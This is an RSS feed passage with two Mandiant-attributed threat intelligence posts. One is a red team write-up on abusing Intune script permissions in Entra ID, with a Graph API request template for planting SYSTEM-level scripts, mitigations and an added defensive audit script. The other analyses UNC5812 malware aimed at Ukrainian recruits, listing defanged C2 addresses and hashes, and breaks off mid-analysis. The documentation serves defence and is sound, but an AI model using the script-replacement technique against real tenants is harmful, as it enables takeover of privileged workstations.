</span></p> <p><span style="vertical-align: baseline;">Mandiant used the excellent <a href="https://github.com/dirkjanm/ROADtools" rel="noopener" target="_blank">ROADTools framework</a> to gain further insight into the customer’s Entra ID environment, and discovered a service principal that was granted the </span><span style="font-style: italic; vertical-align: baseline;">DeviceManagementConfiguration.ReadWrite.All</span><span style="vertical-align: baseline;"> permission.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/intuned-cloud-fig1.max-1000x1000.png" alt="Service Principal was granted DeviceManagementConfiguration.ReadWrite.All permissions (screenshot from ROADTools)"> <figcaption class="article-image__caption "><p data-block-key="ak36s">Figure 1: Service principal was granted DeviceManagementConfiguration.ReadWrite.All permissions (screenshot from ROADTools)</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">This permission allows the service principal to "</span><a href="https://learn.microsoft.com/en-us/graph/permissions-reference#devicemanagementconfigurationreadwriteall" rel="noopener" target="_blank"><span style="font-style: italic; vertical-align: baseline;">read and write Microsoft Intune device configuration and policies</span></a><span style="vertical-align: baseline;">".</span></p> <p><span style="vertical-align: baseline;">Intune’s <a href="https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" rel="noopener" target="_blank">device 
management scripts</a></span><span style="vertical-align: baseline;"> are custom PowerShell scripts that can run on clients running Windows 10 and later. The ability to run scripts on local devices gives administrators an alternative way to apply settings that are not available through Intune's configuration policies or apps. Management scripts are executed when the device starts, with administrative privileges (</span><code style="vertical-align: baseline;">NT AUTHORITY\SYSTEM</code><span style="vertical-align: baseline;">).</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/intuned-cloud-fig2.max-1000x1000.png" alt="Intune Management Scripts are executed at startup"> <figcaption class="article-image__caption "><p data-block-key="xhotc">Figure 2: Intune management scripts are executed at startup</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">The </span><span style="font-style: italic; vertical-align: baseline;">DeviceManagementConfiguration.ReadWrite.All</span><span style="vertical-align: baseline;"> permission is sufficient to list, read, create and update management scripts through the <a href="https://learn.microsoft.com/en-us/graph/api/intune-shared-devicemanagementscript-create?view=graph-rest-beta" rel="noopener" target="_blank">Microsoft Graph API</a></span><span style="vertical-align: baseline;">.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/intuned-cloud-fig3.max-1000x1000.png" 
alt="Device Management Scripts can be modified with DeviceManagementConfiguration.ReadWrite.All"> <figcaption class="article-image__caption "><p data-block-key="xhotc">Figure 3: Device management scripts can be modified with DeviceManagementConfiguration.ReadWrite.All</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">The management script can easily be created or modified using the Microsoft Graph API. The following figure shows an example HTTP request to modify an existing script.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>PATCH https://graph.microsoft.com/beta/deviceManagement/deviceManagementScripts/&lt;script id&gt;
{
  "@odata.type": "#microsoft.graph.deviceManagementScript",
  "displayName": "&lt;display name&gt;",
  "description": "&lt;description&gt;",
  "scriptContent": "&lt;PowerShell script in base64 encoding&gt;",
  "runAsAccount": "system",
  "enforceSignatureCheck": false,
  "fileName": "&lt;filename&gt;",
  "roleScopeTagIds": [ "&lt;existing role scope tags&gt;" ],
  "runAs32Bit": false
}</code></pre></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">The Graph API allows the caller to specify the PowerShell script content as a Base64-encoded value, along with a display name, file name and description. The </span><span style="font-style: italic; vertical-align: baseline;">runAsAccount </span><span style="vertical-align: baseline;">value can be configured as </span><span style="font-style: italic; vertical-align: baseline;">user</span><span style="vertical-align: baseline;"> or </span><span style="font-style: italic; vertical-align: baseline;">system</span><span style="vertical-align: baseline;">, depending on the principal the script should be executed as. 
The </span><span style="font-style: italic; vertical-align: baseline;">roleScopeTagIds</span><span style="vertical-align: baseline;"> value references </span><a href="https://learn.microsoft.com/en-us/mem/intune/fundamentals/scope-tags" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Scope Tags</span></a><span style="vertical-align: baseline;">, an Intune mechanism that groups devices and users together. These can also be <a href="https://learn.microsoft.com/en-us/graph/api/intune-rbac-rolescopetag-create?view=graph-rest-beta" rel="noopener" target="_blank">created</a></span><span style="vertical-align: baseline;"> and <a href="https://learn.microsoft.com/en-us/graph/api/intune-rbac-rolescopetagautoassignment-create?view=graph-rest-beta" rel="noopener" target="_blank">managed</a></span><span style="vertical-align: baseline;"> with the </span><span style="vertical-align: baseline;"> </span><span style="font-style: italic; vertical-align: baseline;">DeviceManagementConfiguration.ReadWrite.All</span><span style="vertical-align: baseline;"> permission. </span></p> <p><span style="vertical-align: baseline;">The </span><span style="font-style: italic; vertical-align: baseline;">DeviceManagementConfiguration.ReadWrite.All</span><span style="vertical-align: baseline;"> permission allowed Mandiant to move laterally to the PAWs used for Entra ID administration by modifying an existing device management script to execute a Mandiant-controlled PowerShell script. When the device reboots as part of the user’s daily work, the Intune management script is triggered and executes the malicious script. </span></p> <p><span style="vertical-align: baseline;">By launching a command-and-control implant, Mandiant could execute arbitrary commands on the PAWs. 
The Red Team waited for the victim to activate their privileged role through Azure Privileged Identity Management and impersonated the privileged account (e.g., through cookie or token theft), thereby obtaining privileged access to Entra ID. These steps allowed Mandiant to obtain </span><span style="font-style: italic; vertical-align: baseline;">Global Administrator</span><span style="vertical-align: baseline;"> privileges in Entra ID, completing the objective of this assessment.</span></p> <h2><span style="vertical-align: baseline;">Remediation and Recommendations</span></h2> <p><span style="vertical-align: baseline;">Mandiant recommends the following hardening measures to prevent this attack scenario:</span></p> <ol> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Review your organization’s security principals for the </strong><strong style="font-style: italic; vertical-align: baseline;">DeviceManagementConfiguration.ReadWrite.All</strong><strong style="vertical-align: baseline;"> permission:</strong> <span style="vertical-align: baseline;">Organizations using Microsoft Intune for device management should treat the </span><span style="font-style: italic; vertical-align: baseline;">DeviceManagementConfiguration.ReadWrite.All</span><span style="vertical-align: baseline;"> permission as sensitive, as it gives the trustee a control relationship over the Intune-managed devices, and by extension, any identities associated with the device. 
<br/></span><span style="vertical-align: baseline;"><br/>Mandiant recommends that organizations regularly review the permissions granted to Azure service principals, paying special attention to the </span><span style="font-style: italic; vertical-align: baseline;">DeviceManagementConfiguration.ReadWrite.All</span><span style="vertical-align: baseline;"> permission, as well as other sensitive permissions (e.g., </span><span style="font-style: italic; vertical-align: baseline;">RoleManagement.ReadWrite.Directory</span><span style="vertical-align: baseline;">, </span><span style="font-style: italic; vertical-align: baseline;">AppRoleAssignment.ReadWrite.All</span><span style="vertical-align: baseline;"> and </span><span style="font-style: italic; vertical-align: baseline;">Application.ReadWrite.All</span><span style="vertical-align: baseline;">).<br/><br/></span><span style="vertical-align: baseline;">Organizations that use Intune to manage PAWs should be especially careful when delegating Intune privileges (either through </span><span style="font-style: italic; vertical-align: baseline;">DeviceManagementConfiguration.ReadWrite.All</span><span style="vertical-align: baseline;"> or through Entra roles such as </span><span style="font-style: italic; vertical-align: baseline;">Intune Role Administrator</span><span style="vertical-align: baseline;">).</span></p> </li> <li role="presentation"><strong style="vertical-align: baseline;">Enable multiple admin approval for Intune:</strong> <span style="vertical-align: baseline;">Intune supports </span><a href="https://learn.microsoft.com/en-us/mem/intune/fundamentals/multi-admin-approval" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">using Access Policies</span></a><span style="vertical-align: baseline;"> to require a second administrator to approve any changes before a change is applied. 
This would prevent an attacker from creating or modifying management scripts with a single compromised account.</span></li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Consider enabling Microsoft Graph API activity logs:</strong><span style="vertical-align: baseline;"> Enabling </span><a href="https://learn.microsoft.com/en-us/graph/microsoft-graph-activity-logs-overview" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Graph API Activity logs</span></a><span style="vertical-align: baseline;"> can help detection and response efforts by providing detailed information about Graph API HTTP requests made to Microsoft Graph resources.</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Utilize capabilities provided by Workload ID Premium licenses:</strong> <span style="vertical-align: baseline;">When licensed for </span><a href="https://learn.microsoft.com/en-us/entra/identity/conditional-access/workload-identity" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Workload-ID Premium</span></a><span style="vertical-align: baseline;">, Mandiant recommends leveraging these capabilities to:</span></p> <ul> <li><span style="vertical-align: baseline;"><span style="vertical-align: baseline;"><span style="vertical-align: baseline;"><span style="vertical-align: baseline;"><span style="vertical-align: baseline;">Restrict privileged service principal usage to known trusted locations only. This limits the risk of unauthorized access and strengthens security by ensuring they are used only from trusted locations. 
</span></span></span></span></span></li> <li><span style="vertical-align: baseline;"><span style="vertical-align: baseline;"><span style="vertical-align: baseline;">Enhance the security of service principals by enabling risk detections in Microsoft Identity Protection. This can proactively block access when suspicious activities or risk factors are identified.</span></span></span></li> </ul> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"><strong style="vertical-align: baseline;">Proactively monitor service principal sign-ins:</strong> <span style="vertical-align: baseline;">Proactively monitoring sign-ins from service principals can help detect anomalies and potential threats. Integrate this data into security operations to trigger alerts and enable rapid response to unauthorized access attempts</span><span style="vertical-align: baseline;">.</span></li> </ol> <p><span style="vertical-align: baseline;">Through numerous adversarial emulation engagements, Red Team Assessments, and Purple Team Assessments, Mandiant has gained an in-depth understanding of the unique paths attackers may take in compromising their target’s cloud estate. 
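</span></p> <p><span style="vertical-align: baseline;">As an added example (not code from this post or from Mandiant), the following Python script shows how the permission review recommended above and the service principal sign-in monitoring can be automated. It resolves which service principals hold the sensitive Microsoft Graph application permissions named above, then flags sign-ins by those principals from outside a trusted network. It runs offline on constructed data shaped like three Microsoft Graph responses: the Microsoft Graph resource service principal with its <code>appRoles</code>, its <code>appRoleAssignedTo</code> collection, and service principal sign-in events. Every GUID, object ID, display name and IP address in it is illustrative, the trusted network 203.0.113.0/24 is an assumption, and the function names are the example's own; in a real tenant the same data comes from the Graph REST API or Microsoft Graph PowerShell.</span></p>

```python
"""Find Entra ID service principals holding sensitive Microsoft Graph application
permissions, then flag their sign-ins from outside trusted networks.

Added example. The inputs are shaped like three Microsoft Graph responses: the
Microsoft Graph resource service principal (appId 00000003-0000-0000-c000-000000000000),
whose appRoles map an appRoleId GUID to a permission name; its appRoleAssignedTo
collection; and service principal sign-in events. All GUIDs, object IDs, names and
addresses below are constructed sample data."""
import ipaddress

# Application permissions the post calls out as high impact on a service principal.
SENSITIVE_APP_ROLES = {
    "DeviceManagementConfiguration.ReadWrite.All",
    "RoleManagement.ReadWrite.Directory",
    "AppRoleAssignment.ReadWrite.All",
    "Application.ReadWrite.All",
}

# Constructed Microsoft Graph resource SP, trimmed to appRoles (GUIDs illustrative).
GRAPH_RESOURCE_SP = {
    "appId": "00000003-0000-0000-c000-000000000000",
    "appRoles": [
        {"id": "a1000000-0000-4000-8000-000000000001", "value": "DeviceManagementConfiguration.ReadWrite.All"},
        {"id": "a1000000-0000-4000-8000-000000000002", "value": "RoleManagement.ReadWrite.Directory"},
        {"id": "a1000000-0000-4000-8000-000000000003", "value": "Application.ReadWrite.All"},
        {"id": "a1000000-0000-4000-8000-000000000004", "value": "User.Read.All"},
    ],
}

# Constructed appRoleAssignedTo collection for the Graph resource SP.
APP_ROLE_ASSIGNED_TO = {"value": [
    {"principalType": "ServicePrincipal", "principalId": "sp-intune-automation",
     "principalDisplayName": "intune-automation", "appRoleId": "a1000000-0000-4000-8000-000000000001"},
    {"principalType": "ServicePrincipal", "principalId": "sp-hr-sync",
     "principalDisplayName": "hr-sync", "appRoleId": "a1000000-0000-4000-8000-000000000004"},
    {"principalType": "ServicePrincipal", "principalId": "sp-legacy-app",
     "principalDisplayName": "legacy-app", "appRoleId": "a1000000-0000-4000-8000-000000000002"},
    {"principalType": "ServicePrincipal", "principalId": "sp-legacy-app",
     "principalDisplayName": "legacy-app", "appRoleId": "a1000000-0000-4000-8000-000000000003"},
    {"principalType": "User", "principalId": "u-alice",
     "principalDisplayName": "alice", "appRoleId": "a1000000-0000-4000-8000-000000000001"},
]}

# Constructed service principal sign-ins (field names as in the signIns resource).
SP_SIGN_INS = [
    {"servicePrincipalId": "sp-intune-automation", "servicePrincipalName": "intune-automation",
     "ipAddress": "203.0.113.10", "createdDateTime": "2024-11-01T08:00:00Z"},
    {"servicePrincipalId": "sp-intune-automation", "servicePrincipalName": "intune-automation",
     "ipAddress": "198.51.100.77", "createdDateTime": "2024-11-01T23:41:00Z"},
    {"servicePrincipalId": "sp-hr-sync", "servicePrincipalName": "hr-sync",
     "ipAddress": "198.51.100.77", "createdDateTime": "2024-11-01T23:42:00Z"},
]

# Assumed: the only network from which privileged automation should authenticate.
TRUSTED_NETWORKS = [ipaddress.ip_network("203.0.113.0/24")]


def app_role_index(resource_sp):
    """Map appRoleId GUID -> permission name from the resource SP's own appRoles."""
    return {role["id"]: role["value"] for role in resource_sp["appRoles"]}


def find_sensitive_grants(resource_sp, assigned_to, sensitive=SENSITIVE_APP_ROLES):
    """Return {principalId: (displayName, sorted permission names)} for service
    principals that hold any of the sensitive application permissions."""
    index = app_role_index(resource_sp)
    found = {}
    for a in assigned_to["value"]:
        if a.get("principalType") != "ServicePrincipal":
            continue  # user and group assignments are out of scope here
        name = index.get(a["appRoleId"], "<unknown:" + a["appRoleId"] + ">")
        if name in sensitive:
            found.setdefault(a["principalId"], (a["principalDisplayName"], set()))[1].add(name)
    return {pid: (dn, sorted(perms)) for pid, (dn, perms) in found.items()}


def untrusted_privileged_sign_ins(sign_ins, privileged_ids, trusted=TRUSTED_NETWORKS):
    """Sign-ins by privileged SPs from outside the trusted networks: the events a
    Conditional Access location policy for workload identities would have blocked."""
    hits = []
    for ev in sign_ins:
        if ev["servicePrincipalId"] not in privileged_ids:
            continue
        ip = ipaddress.ip_address(ev["ipAddress"])
        if not any(ip in net for net in trusted):
            hits.append((ev["servicePrincipalName"], ev["ipAddress"], ev["createdDateTime"]))
    return hits


if __name__ == "__main__":
    grants = find_sensitive_grants(GRAPH_RESOURCE_SP, APP_ROLE_ASSIGNED_TO)
    for pid, (name, perms) in grants.items():
        print(f"REVIEW {name} ({pid}): {', '.join(perms)}")
    for name, ip, ts in untrusted_privileged_sign_ins(SP_SIGN_INS, set(grants)):
        print(f"ALERT {name} signed in from untrusted {ip} at {ts}")
```

<p><span style="vertical-align: baseline;">The appRoleId-to-name lookup is driven by the resource service principal's own appRoles rather than a hard-coded GUID list, which is how Graph defines the mapping and keeps the review from drifting from what the tenant actually exposes. Assignments with principalType User or Group are skipped because the post's concern is workload identities; widen the filter if delegated grants are in scope. The sign-in check is a detection for tenants that have not yet enforced a location policy for workload identities; once the policy is in place the same events appear as blocked sign-ins.</span></p> <p><span style="vertical-align: baseline;">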
Review our </span><a href="https://cloud.google.com/security/consulting/mandiant-technical-assurance"><span style="text-decoration: underline; vertical-align: baseline;">Technical Assurance</span></a><span style="vertical-align: baseline;"> services and </span><a href="https://www.mandiant.com/contact-us" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">contact us</span></a><span style="vertical-align: baseline;"> for more information.</span></p></div></description><pubDate>Wed, 06 Nov 2024 05:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/topics/threat-intelligence/abusing-intune-permissions-entra-id-environments/</guid><category>Threat Intelligence</category><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>(In)tuned to Takeovers: Abusing Intune Permissions for Lateral Movement and Privilege Escalation in Entra ID Native Environments</title><description></description><site_name>Google</site_name><url>https://cloud.google.com/blog/topics/threat-intelligence/abusing-intune-permissions-entra-id-environments/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Mandiant </name><title></title><department></department><company></company></author></item><item><title>Hybrid Russian Espionage and Influence Campaign Aims to Compromise Ukrainian Military Recruits and Deliver Anti-Mobilization Narratives</title><link>https://cloud.google.com/blog/topics/threat-intelligence/russian-espionage-influence-ukrainian-military-recruits-anti-mobilization-narratives/</link><description><div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">In September 2024, Google Threat Intelligence Group (consisting of Google’s Threat Analysis Group (TAG) and Mandiant) discovered UNC5812, a suspected Russian hybrid espionage and influence operation, delivering Windows and Android malware using a Telegram persona named "Civil Defense". 
"Civil Defense" claims to be a provider of free software programs designed to enable potential conscripts to view and share crowdsourced locations of Ukrainian military recruiters. If installed with Google Play Protect disabled, these programs deliver an operating system-specific commodity malware variant to the victim alongside a decoy mapping application we track as SUNSPINNER. In addition to using its Telegram channel and website for malware delivery, UNC5812 is also actively engaged in influence activity, delivering narratives and soliciting content intended to undermine support for Ukraine's mobilization efforts.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/russian-espionage-influence-fig1.max-1000x1000.png" alt="UNC5812’s “Civil Defense” persona"> </a> <figcaption class="article-image__caption "><p data-block-key="93y5c">Figure 1: UNC5812’s "Civil Defense" persona</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">Targeting Users on Telegram</span></h2> <p><span style="vertical-align: baseline;">UNC5812’s malware delivery operations are conducted both via an actor-controlled Telegram channel </span><code><span style="vertical-align: baseline;">@civildefense_com_ua</span></code><span style="vertical-align: baseline;"> and website hosted at </span><code><span style="vertical-align: baseline;">civildefense[.]com.ua</span></code><span style="vertical-align: baseline;">. The associated website was registered in April 2024, but the Telegram channel was not created until early September 2024, which we judge to be when UNC5812’s campaign became fully operational. 
To drive potential victims towards these actor-controlled resources, we assess that UNC5812 is likely purchasing promoted posts in legitimate, established Ukrainian-language Telegram channels. </span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">On September 18, 2024, a legitimate channel with over 80,000 subscribers dedicated to missile alerts was observed promoting the "Civil Defense" Telegram channel and website to its subscribers. </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">An additional Ukrainian-language news channel was observed promoting Civil Defense’s posts as recently as October 8, indicating that the campaign is probably still actively seeking new Ukrainian-language communities for targeted engagement.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Channels where "Civil Defense" posts have been promoted advertise the ability to reach out to their administrators for sponsorship opportunities. 
We suspect this is the likely vector that UNC5812 is using to approach the respective legitimate channels to increase the operation’s reach.</span></p> </li> </ul></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/russian-espionage-influence-fig2.max-1000x1000.png" alt="Civil Defense promoted in Ukrainian-language missile alert and news communities."> </a> <figcaption class="article-image__caption "><p data-block-key="93y5c">Figure 2: Civil Defense promoted in Ukrainian-language missile alert and news communities</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">The ultimate aim of the campaign is to have victims navigate to the UNC5812-controlled "Civil Defense" website, which advertises several different software programs for different operating systems. When installed, these programs result in the download of various commodity malware families. 
</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">For Windows users, the website delivers a downloader tracked publicly as </span><a href="https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pronsis-loader-a-jphp-driven-malware-diverging-from-d3fck-loader/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Pronsis Loader</span></a><span style="vertical-align: baseline;">, written in PHP and compiled into Java Virtual Machine (JVM) bytecode using the open source </span><a href="https://github.com/jphp-group/jphp" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">JPHP project</span></a><span style="vertical-align: baseline;">. When executed, Pronsis Loader initiates a convoluted malware delivery chain, ultimately delivering SUNSPINNER and a commodity information stealer commonly known as PURESTEALER. </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">For Android users, the malicious APK file attempts to install a variant of the commercially available Android backdoor CRAXSRAT. Different versions of this payload were observed, including a variant containing SUNSPINNER in addition to the CRAXSRAT payload. </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">While the Civil Defense website also advertises support for macOS and iPhones, only Windows and Android payloads were available at the time of analysis. 
</span></p> </li> </ul></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/russian-espionage-influence-fig3.max-1000x1000.png" alt="Download page, translated from Ukrainian"> </a> <figcaption class="article-image__caption "><p data-block-key="93y5c">Figure 3: Download page, translated from Ukrainian</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Notably, the Civil Defense website also contains an unconventional form of social engineering designed to preempt user suspicions about APK delivery outside of the App Store and justify the extensive permissions required for the CRAXSRAT installation. </span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">The website’s FAQ contains a strained justification for the Android application being hosted outside the App Store, suggesting it is an effort to "protect the anonymity and security" of its users, and directing them to a set of accompanying video instructions. </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">The Ukrainian-language video instructions then guide victims on how to disable Google Play Protect, the service used to check applications for harmful functionality when they are installed on Android devices, as well as to manually enable all permissions once the malware is successfully installed. 
</span></p> </li> </ul></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/russian-espionage-influence-fig4.max-1000x1000.png" alt="Screenshots of video instructions to turn off Google Play Protect and manually enable CRAXSRAT permissions"> </a> <figcaption class="article-image__caption "><p data-block-key="93y5c">Figure 4: Screenshots of video instructions to turn off Google Play Protect and manually enable CRAXSRAT permissions</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">Anti-Mobilization Influence Operation</span></h2> <p><span style="vertical-align: baseline;">In parallel to its efforts to deliver malware and gain access to the devices of potential military recruits, UNC5812 is also engaged in influence activity to undermine Ukraine's wider mobilization and military recruitment efforts. The group's Telegram channel is actively used to solicit visitors and subscribers to upload videos of "unfair actions from territorial recruitment centers," content that we judge likely to be intended for follow-on exposure to reinforce UNC5812's anti-mobilization narratives and discredit the Ukrainian military. 
Clicking on the "Send Material" (Ukrainian: Надіслати матеріал) button opens a chat thread with an attacker-controlled </span><span style="vertical-align: baseline;"><code>https://t[.]me/UAcivildefenseUA</code> </span><span style="vertical-align: baseline;">account.</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">The Civil Defense website is also interspersed with Ukrainian-language anti-mobilization imagery and content, including a dedicated news section to highlight purported cases of unjust mobilization practices. </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Anti-mobilization content cross-posted to the group's website and Telegram channel appears to be sourced from wider pro-Russian social media ecosystems. In at least one instance, a video shared by UNC5812 was reposted a day later by the X account of the Russian Embassy in South Africa.</span></p> </li> </ul></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/russian-espionage-influence-fig5.max-1000x1000.png" alt="UNC5812&#x27;s Telegram and a Russian government X account sharing the same video in close proximity, highlighting their shared focus on anti-mobilization narratives"> </a> <figcaption class="article-image__caption "><p data-block-key="n3t5d">Figure 5: UNC5812's Telegram and a Russian government X account sharing the same video in close proximity, highlighting their shared focus on anti-mobilization narratives</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">Malware Analysis</span></h2> 
<p><span style="vertical-align: baseline;">UNC5812 operates two unique malware delivery chains for Windows and Android devices that are delivered from the group's website hosted at civildefense[.]com[.]ua. Common between these distinct delivery chains is the parallel delivery of a decoy mapping application tracked as SUNSPINNER, which displays to users a map that renders purported locations of Ukrainian military recruits from an actor-controlled command-and-control (C2) server.</span></p> <h3><span style="vertical-align: baseline;">SUNSPINNER</span></h3> <p><span style="vertical-align: baseline;">SUNSPINNER (MD5: 4ca65a7efe2e4502e2031548ae588cb8) is a decoy graphical user interface (GUI) application written using the Flutter framework and compiled for both Windows and Android environments. When executed, SUNSPINNER attempts to resolve a new "backend server" hostname from </span><code style="vertical-align: baseline;">http://h315225216.nichost[.]ru/itmo2020/Student/map_markers/mainurl.json</code><span style="vertical-align: baseline;">, followed by a request for map markers from </span><code style="vertical-align: baseline;">https://fu-laravel.onrender[.]com/api/markers</code><span style="vertical-align: baseline;"> that are then rendered on the app's GUI.</span></p> <p><span style="vertical-align: baseline;">Consistent with the functionality advertised on the Civil Defense website, SUNSPINNER is capable of displaying crowdsourced markers with the locations of the Ukrainian military recruiters, with an option for users to add their own markers. However, despite possessing the limited functionality required for users to register and add markers, the displayed map does not appear to have any genuine user inputs. All markers present in the JSON file pulled from SUNSPINNER's C2 infrastructure were added on the same day by the same user. 
</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/russian-espionage-influence-fig6.max-1000x1000.png" alt="Decoy application for monitoring the locations of Ukrainian military recruitment staff"> </a> <figcaption class="article-image__caption "><p data-block-key="n3t5d">Figure 6: Decoy application for monitoring the locations of Ukrainian military recruitment staff</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Windows — Pronsis Loader to PURESTEALER</span></h3> <p><span style="vertical-align: baseline;">The Windows payload downloaded from the Civil Defense website, </span><code style="vertical-align: baseline;">CivilDefense.exe</code><span style="vertical-align: baseline;"> (MD5: 7ef871a86d076dac67c2036d1bb24c39), is a custom build of </span><a href="https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pronsis-loader-a-jphp-driven-malware-diverging-from-d3fck-loader/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Pronsis Loader</span></a><span style="vertical-align: baseline;">, a recently discovered commodity malware operated primarily by financially motivated threat actors. </span></p> <p><span style="vertical-align: baseline;">Pronsis Loader is used to retrieve both the decoy SUNSPINNER binary and a second-stage downloader "civildefensestarter.exe" (MD5: d36d303d2954cb4309d34c613747ce58), initiating a multi-stage delivery chain using a series of self-extracting archives, which ultimately executes PURESTEALER on the victim device. 
The second-stage downloader is written in PHP and is compiled into Java Virtual Machine (JVM) bytecode using the open-source </span><a href="https://github.com/jphp-group/jphp" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">JPHP project</span></a><span style="vertical-align: baseline;"> and then built as a Windows executable file. This file is automatically executed by the CivilDefense installer. </span></p> <p><span style="vertical-align: baseline;">The final payload is PURESTEALER (MD5: b3cf993d918c2c61c7138b4b8a98b6bf), a heavily obfuscated commodity infostealer written in .NET that is designed to steal browser data such as passwords and cookies, cryptocurrency wallets, and data from other applications such as messaging and email clients. PURESTEALER is offered for sale by "Pure Coder Team" with prices ranging from $150 for a monthly subscription to $699 for a lifetime license.</span></p> <h3><span style="vertical-align: baseline;">Android — CraxsRAT</span></h3> <p><span style="vertical-align: baseline;">The Android Package (APK) file downloaded from the Civil Defense website "CivilDefensse.apk" (MD5: 31cdae71f21e1fad7581b5f305a9d185) is a variant of the commercially available Android backdoor CRAXSRAT. CRAXSRAT provides functionality typical of a standard Android backdoor, including file management, SMS management, contact and credential harvesting, and a series of monitoring capabilities for location, audio, and keystrokes. Similar to PURESTEALER, it is also available for sale on underground forums.</span></p> <p><span style="vertical-align: baseline;">The Android sample being distributed at the time of analysis only displayed a splash screen with the "Civil Defense" logo. 
